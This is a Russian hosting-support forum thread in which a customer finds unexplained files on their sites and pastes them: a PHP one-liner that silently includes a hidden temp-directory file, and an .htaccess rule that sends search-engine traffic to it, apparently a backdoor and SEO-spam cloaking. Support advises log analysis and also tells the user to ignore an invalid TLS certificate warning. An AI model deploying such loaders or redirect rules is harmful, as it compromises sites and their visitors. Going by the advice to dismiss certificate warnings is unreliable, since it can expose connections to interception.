Хостинг. появились файлы непонятные

itradestorez
5 лет
0

здравствуйте, во всех сайтах появились такие файлы

что с ними делать?) причем созданы они явно давно, но стали отображаться на днях

rudenko
5 лет
0

Приведите пример исходного кода файла index.php, возможно это вирус на сайте

itradestorez
5 лет
0

<?php error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?>

itradestorez
5 лет
0

htaccess

<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>

rudenko
5 лет
0

Смотрите дату создания файла и ищите в логах по этому времени и дате запросы, которые приходили на Ваш сайт. Скорее всего это хакерская атака.

itradestorez
5 лет
0

Вроде бы не вредоносные файлы, они появились сегодня

Возможно у вас было какое-то обновление, и технические файлы из скрытых стали открыты для чтение через ftp?

rudenko
5 лет
0

Вроде бы не вредоносные файлы, они появились сегодня во всех четырех хостинг аккаунтах © itradestorez

Наш антивирус не обнаруживает 100% вирусов, любой файл может быть результатом взлома, исходный код там очень странный, так как он подключает данные из сессии.

itradestorez
5 лет
0

посоветуйте пожалуйста чем лучше проверить тотально все хостинги?

файлы эти я удалил, все работает как и прежде, ничего не отвалилось, значит они были не системные и появились непонятно откуда

itradestorez
5 лет
0

пытаюсь перевести все подключения на FTP + TSL/SSL пишет что сертификат invalid

если нажать continue то подключение проходит, но оно получается не защищено?

по SFTP вообще не захотел подключатся хотя и порт менял на 22 (или надо другой какой-то?)

rudenko
5 лет
0

пытаюсь перевести все подключения на FTP + TSL/SSL пишет что сертификат invalid © itradestorez

Подключение зашифровано, все ок. Не стоит обращать внимание на это предупреждение.

rudenko
5 лет
0

посоветуйте пожалуйста чем лучше проверить тотально все хостинги? © itradestorez

Только ручками, универсального антивируса для php кода нет. Нужно проделывать то, что я описал в начале темы.
Скорее всего через уязвимость в CMS залили какой-то shell, но он оказался нерабочим, так как у нас на хостинге не стандартное размещение папок и нет public_html и прочих директорий.

itradestorez
5 лет
0

Спасибо за консультацию, будем поглядеть что будет дальше, ручками искать не вариант, десятки тысяч файлов :(

rudenko
5 лет
0

Спасибо за консультацию, будем поглядеть что будет дальше, ручками искать не вариант, десятки тысяч файлов :( © itradestorez

Хоть миллион, по дате и точному времени создания вирусного файла находите запрос в логах, и видите откуда он прилетел.
Если повториться - напишите на форуме, я посмотрю.

itradestorez
5 лет
0

не знаю как в личку скинуть, в общем сайт mariavasilenko.ru весь в этих файлах непонятных и сегодня обнаружил порнотрафик на сайт

хотя если из поиска перейти на эту страницу, то никакого адалта там нет, странно

я уверен на 100% проблема идет с этого сайта, но как найти где именно этот вирус среди 1000 php файлов :(
[[upload]Снимок экрана 2016-09-10 в 3.05.16.png[[/upload]]
[[upload]Снимок экрана 2016-09-10 в 3.05.03.png[[/upload]]

Тема закрыта.